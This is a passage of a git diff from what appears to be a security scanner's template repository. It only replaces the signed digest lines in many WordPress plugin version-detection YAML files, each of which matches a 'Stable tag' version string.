'(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220537987128490f96c3d03e7a38f41007643cb0695ac78e2b5acc53110d69e47ed022100ebcd6a125a5f3c3f9f8af325bd93862258eb1ecd3455dae8e3cfa56742ed2abd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009193a3460e9f9c1cb8335b2baf4a46af0dc191fde3c10a4f65eaa04ca17aa21e02207ab14c82fc6dfd82d53647ad60dbceba608fd62419ba88b34ef8a194aef734b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index 64559d42cc..0b65539968 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201aa3b8786cacdd93a30bcade032d76e3c95d2c7de5fca4f6cda2a8a45fbe80d7022007aeccddea9c08c9ef465c40fce1d99947e4ad5361c426ec9f711b8c58ca8698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206adb952b37d3724301bd425b215b0696889bd9ad751dd61a4897f6de0c975761022100e2f3acb61df83e4b3bf35e263abe312d7af2bfb5dbabf31c5411c9f7c55287df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index f6cfbc9a92..d6c1eece7d 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205900bb1164ed80d9d7831803880ff733c0b473dcebf6b3bedbbb357d4c6e8de702205d330f3a7906d7734dd93141d663cdc00099a0ca33034fa3136d28aa329fadab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d755e2b4f7816b15b743fe07d636a480d7134a0fff1f0230f4a59f367abf8f2022100e2a772d18f3b1505e81c88c4a8836059d6f3943e60df49d7c4f3d6eef7914090:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 6f21659506..a38e0356ca 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100cbd72498db335a0d15b5a4d94a847e462d7354f418e233523bc88f3c4887174a022100ca6d55f57b8db985fbd2c354d522e02f20ebc627a16e5746d45540f8e326b259:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bb6ed7128a82c4fb0ef6037a701d5cd2e8c1bc31e6d5a4e59ad421f68168383022100e49ae1145691104bc18dc32182171ab6d478fdc315d776e2fcc1016563befda8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 810b76aac3..b4c1cee5a3 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b4178e686941d9b13f8e0f2c8a8ac1171685865c712ca8dfeb525d57db3ec93b0220646845d165344fa2d20a1e86edce25ffc4d2cbf95add8e75f1da009a366fefe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eb72b4ab9be95c5b34790189ae31d5b5e2731b728040918ee8625ba879ac306e022037393f96ab924ae6d820169f8db7758447d20e631c4bf82bbf6a8b30720c6f9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 319f2c551d..7427238590 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220409e3d5e0ff244121f95bd71f07338685c16bd0345df4605ea44974215c8c74a0220515d97612a50ae928d3baa49cb7905cd0a91789e7274fb0e021cb698536471a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207ac2db1e048c692da64f6e7e3d49103b2e5bb04aa7a526852873de0952b5e118022100829c0ba9f206cc42d0548d72cfb0826ebc19b0fb72993cddce527f6213556699:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 85972dfecb..b0fc961037 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009d0c9ccd5fa970032db8b7b96b01afa59070df497281616f31f81c422e7951f302204de5b0a344e21185bf021c899d9ace1b8364afa66cf16e315d1047c14132c88c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204353be9b511f0474990b0e63a77e203774eb406a9e0cfaed34dcdc3fb91b9bdb02203e8304cbdcf8803662dc89a8e6f32b652860dbf1d35f956d0de9a8ac2cdf0206:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 1d37e4042d..b0c6c9ff6d 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d717c86eb793b2cb17b922074620d8520e584c49a8dcd50afdf4f43eedc5614d022023dbcf1c4ee33fb395699075dbb002c3c425a2c717b02fee4ce316dd2bcff443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a08a378300fa22d785d26dbb44e73941e4c91d7480db66e22cbdcd4a74a831702200aaca7370ef71cb3e4fea63549afc3f5085aa1f0c1509b41850d6fe5f869184c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 5d25a323a6..1a714dd4af 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200cf1f3428579daca118d0a8c0f29d8fa19e9f4db8764f40a284a6f2538d7385402202694bb01d993b4dc2d8218c736edb0647040dce82fc1237cbb5f56613a6a34d6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022012187bb25df388f6dc551543f9c0215753121389cd84d6708c0d0480abbc36c702205a4e99dd7b1a26eac7e1dc76e09cd81b4e6d83b996238c856bedd4ba55a8c9d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 355fe9112c..83521b5fa4 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a0048304602210097d634783768699bedcc16519eb6d20efbb0557a8c25af447a282157082810fa022100c9535191aa279bf6d9dca2c8663473c222600cf79b04add3023da87b49a30379:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9d5f97f1a19d3d49dd8deb348757564747320c9de7cf60755c154a82e5c1237022100b0f8265bd442719bb62650b8e85f76137bc56ddc490bb91967d021d86b7d22d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 0d278f3b81..1f63ef73ab 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203096726eca21da71c9cc49547fd3ab82ab73c4a399b62c83f83bc78d2e215a010220709f4ced66cc17de530ff77e79172982351fd487540f07d2ac6e10bfb10b24dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202e745276be7467cee6126c2736b3b7e521f6f088a5868e9a2c564c377782eb950220441adb1dde8c721a6fd0d4e7151fabb4db0eb9eb37d51e43b130a296e9460a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index b56a989fd9..493fff62c7 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220776696b8fd36ebda6ed8cf5c21dc2d323b42a00d17d9c71183e5c4a675a7e26702200f1f5994e42b2c3a9175040935740dda519f196036f2b2da17db3166d308396e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220041b975c847859b68ee8ab300df1c015cf037bb93ad7a65855582b058ef34e1a02210080289a485c7a3d5608c8bd54bbe6f28b38f0ccd83585d155a593f9a8675c92e5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 77c178206a..28470db5ed 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022026288df1e53996c9148121e6d2737d44130f79daae4f8a94b78ad9fad48d87e102202501556520f9035eae1680ebddaef2a9c8fb207f46affafb6d6623ab2a234333:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d8a1da741bc1cb086588a1b00de37b5df6ad8a8cf92af512cd72dbcd55124595022010e1a4671b705af5e0077398585fc801742c9e971e3b6f9fcede0b5c10015a3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 04a91a1b2a..67173ce634 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203b41aa7b8779ab204aa560f7c3d98720deb61a090edf93f8fb02a9b10bf950d80220511ded87aff1dfc3bfca5a578976ab2d5a572f344f2620ce38c6b104933bfaf3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a90eea64eecf5bb9c9cad4750e1b77879a701e4a2cb94c41aa6350ecb981ff6002205af12ad8ef0de06af6c9366a4da63cbd5dd51792de3253b7858eb034c1811ce9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index ce63539005..bef6daf987 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d64d8428768d2fbf8fe2bf8b832e18db1ae29b7e349788fd80fdd18e6bf70a4a02206111448a267ca44099b02fee633832b7618cf2e92fd904d10bc934c23059b9ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009491f26065b4e56ee6fd646c449c2ecf4651b3748318172bd465dd1a5d7dc3c202210091e90b55ae33209c4fddda4c348331c3831529b28549f24cdb265ac48031870c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index f9662861c4..3d8ff553a3 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e0d0627f0395af93bce89a5ae419b987b8b1e8b063c8d5395b7daa6a21df2506022100dd50f801c168e71bf2a7ee06d146a685265d6641d58324d38dc22fe008a415e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200d450cf83c7f28b8326e1cce9887bb955aee3fa5efd0b91c57e2c3a6872d38d60221008723563c3a03e7f15cea00f893db225bc21cdd6cc98d43d5470527c04973d813:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index be24e24f45..eab6f405ef 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009659cdecea0406f66a0720b8519661537ad660640e4825ead2b6315f9929572e02201aa72c62baeee1013bf09246c0c1ba8c142be7f868ffbff347ce361e427cddd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cfdd05e3c13089e9f54bb263b697487cd73a46ee320c5a24fa6078e67dc6f1a2022100fe9a02d84a4fc53e022fd7e2f60c5586b4b3ad26ac350c000f475cc22188cb35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index 0ca3ca0e3d..d5c40793b1 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206b81f051a82491593ea9f04e676fef464276575bb17cb923792835ac95e5b2b3022011899824a66393eb245caf5f697da5ec2094c1216f9a8e3019a8e2dad4ebe3c1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206e800abf11cfec4ae4a15effa347037893795bfc572ce18ffb7a5f6ef724240802203ddb71b7c8f155f7844711085d8c5e8826949993fabf1a082103786bd55d1e35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 0cfd15b021..aad628a97d 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202c5d39cd40a44e32e2f0f9d346c26005d00bf41377e9b08c8292434fbd63552b02206d9b4aae573ba6f2d4736f815a81a08860c8fabb970b3dc0f874a6ce48547185:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100883155b4a8d09bd01519542e9c4c4f225972ab3ef42afea4059ed0be5b49757902200f279fb96b957a89f18d10a153391a02c2f06236987d1e0ef4480e566a9759be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index b2d5e2a618..a7f26ad472 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100e3a441a8118c6ac3c98be59e0cbf2e5f5d418b542151eb0eeba62deb23db222b0220280a5db71704934362cd3cb8e12890296b497b27612eee9347109bc5e946685b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a0b111f25c23c34b66d79b2582ebd48c5dd171048c03978f5600e33ff3f7a982022056634c159d2ea4d04a7dfb2ba8429568d355a1801f6089d7fcdc1cb4bf58f11f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index b443d5c091..3157f6910d 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fb7170cfcfc47c6480161de7f2a24e0d078c0e8122b8d789a9e86bd25c384715022075aed644265ef54338d88b2188009fd707ef01efb9b235a2223a67099019b5ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cab13fd9f04437554dcd20bbe7ea53016a808cbffc2f5568e763a543f14a986d02203e788913cc22ffa57869d3eeb01c9babbec18483b852dead8f397ead8fe4a475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 5fca4a91fa..99d1ec63c0 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502202487d127e36e3b1995da34ede8bc6de674f9b7c0c13f28c11d28522a89cf5de50221008c520b3264913e98810ffbaeb147eedaa68fe20ca66d8662b463042025a03c8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100de3d7aa407570a3cad535dd73619392560444eb741c981b83a37104363785991022100c47689692866dec550e8a09a1a628c489806c6cfe51d1072c0252a8b64fa55db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 7fba7e030a..dcdc14882a 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009069ce3cc76e476857f12f516345287c3afc1f2976058c93134ca592d715fbea02201302ebcf8475191c302fdc17205491dd9a8ec0152e47ed5ae40cdea87db4b93c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207c30f714a179c944588bdbad9c9e34dbc2afd825389cf3022f4edf4f664e1ca70221008df3cb280a2b4afbf6eeed5f016b5687d7609025b562a31526decdf285ca09e9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index e9b660a54b..c5beba9e56 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220229d52d6bb102b142ff0a8559dca25f0736eab62b474943e15d5ab569e97bf6d022032b196e44b9ab140a3de6f19a36552beed08fe70338c4ce0cbff0934910b51d4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200bbf81896e8ff4f7bbb5a0835567bf2dc4aa7ccd575f96415f0eaa907f189fbc0220163a2c1818ec6100fbb0d2728922ed161ccd95eee11681a3bd8104fb47af9cce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 8b6c139037..5ba984bab8 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402201a097237943b23d46b9b7eb28124f2e303b8ed6463187c4bcde70da28cf7494e022040219285a49fc071b4993b4b9b66540d6ea00a602b46bbccf8f3ae8cb4bcc7bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203bf0ad2b21a6cf5170019aa9faf086ab2f6b85ffebec0ce8bd9876f3a325f826022100d1f7299e5ab2b1bd568b64ba757f5aabf236591062ba32205c534411e4d7ac9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index cdbea42fc2..aae3dc8e8c 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022022b04d354c00397ee08646c722782c669b98f1b9c4ede990367a86586011b83c022100a4f9fb3b21aa5151edd28f0d048df1cb9206cdf66c89d81ae04456fd49f39de2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207d79d9c6f8e047ea9b670e5681b6984ecc3d704c4844d5bd72add8c1d9e4a31e022100ff48efb22055e27c177441a1b59838176885d722ddd9c5b4634c5f843f9eb2cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 229e1844aa..df86284171 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100db39b7a17301966a55c632e417899d450c9ee990ecfa4486109e3bc19e9cbb2e022100dfbabf0780ef969ae25df2f24eaba35eeafe4e1720882dc19c475100c7dcd0f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100980a96bf92b39e4fa417d9aa94ce4ee084aace6afea5ea1b075947e48fa9e75f022015c456f3d011cb7380a9d633ac11378b97767cf926369ea09502310595a6af53:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index ed51865b72..9466778c4e 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402200ddeac4024946868919ff3aacb75339a3e30a9be7f6adb157d7cd684801248cb0220755c30ee9fd5d36022a4aaaa5e8a74f86386d0c5d8392c527c7881235292cc1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203152400e990da5ef86c600fb9df545686481906dbff34603303cd7caba05a6ed02201547d5f499f8ff5f083659982fb145b12c759d9990fb2f1ce468e04777509c5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 3308b66272..dba43fc1e8 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009c8cc48bb4d15d888c0b5e5399a1fa54b446b65fb391629cc4ae7aa5ef06867a022100ae48d47de4d6c2f43d1b92592998a4e1eccffa47ac1ae304565272d88a12d267:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0bda84216e687a9365e0c8f853b030c47bbff103894473238f0cb3242acb4c50220651153bcb89f24faef9db74ed6ba2f688c69851968ab602df3c15307dda18301:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index b08562c340..faae80f706 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221009d10db1426ddf0a4290d5c25668148cc47362843c8910d27a542370b8349c37202203167a36a7e72143a67292db8ff1b3d4ca8b33f30a6573920ce972ed774592f63:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206ca9863a886f6fee45da73950f2a556865fb28c75e6de9e4b9e3d0ff24d3a97e022100e7bcb1b953bc2a0216f558bf723491c7a66e73cbd083521740d358fbd129a8a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 6c5b73e37c..6f99d1e424 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100ade4c05b29aeb2871744564cc1e3dd8ba3bd642422128881a2313a13afcb096502206d4e4ac2679e4ef2a59d3f6e1a19b11e3aab644632c1454e95096f1d2e96f6ff:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100db39fa3c1ef6e3715c428f32e0e7736ad1eec5ff41488f4644a45d2f121e6ea9022100c86393f475b392e962aefea24c8e549db8ee2f08af6fe277fe3287eb18729b5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 61b078041f..248a06d90f 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022070df4a4489ddab24023208726c0031363427e24604df317032163222e9034c80022100c489880692b79147b1714d03168f4044b0bd61efd1ff5ab5c6713ad4b31c6ff9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b8513de3e85987c6b240255e85faaaef94a1110e6ffdf4b9feca0913c950c9ec0220335df6967c5c3b02bb6cafeabaa7a88af5ead6e8810bdaab4224e5366fa474fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index 520e871871..872ebf1b7e 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fe83bc598cf2d0a07fb3620d332d32bbe704df392f603647b83dc6b6a144d140022079c75b50e9a673e52a317e31e33dabc62298dd5b6c68e189abc8487d9c84b3da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205642fcf05745962840d37c590020e2db0cf49ed541b9db01ca0baaac760e08bc02200a6ca1f6c736138227e4b4ba7cea56c6a5f5cdc40646dc708bdc06ee9998e904:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 215c092dd7..2585a1bec4 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,5 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221009bdc5757bb259d006841c2f990af07fde792eaf437fbeed8dfb54ed6afb8750f022100be421264f07ac64fe7b410d30e29d55ce739223815836b7cabdedc7cfd7ce480:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 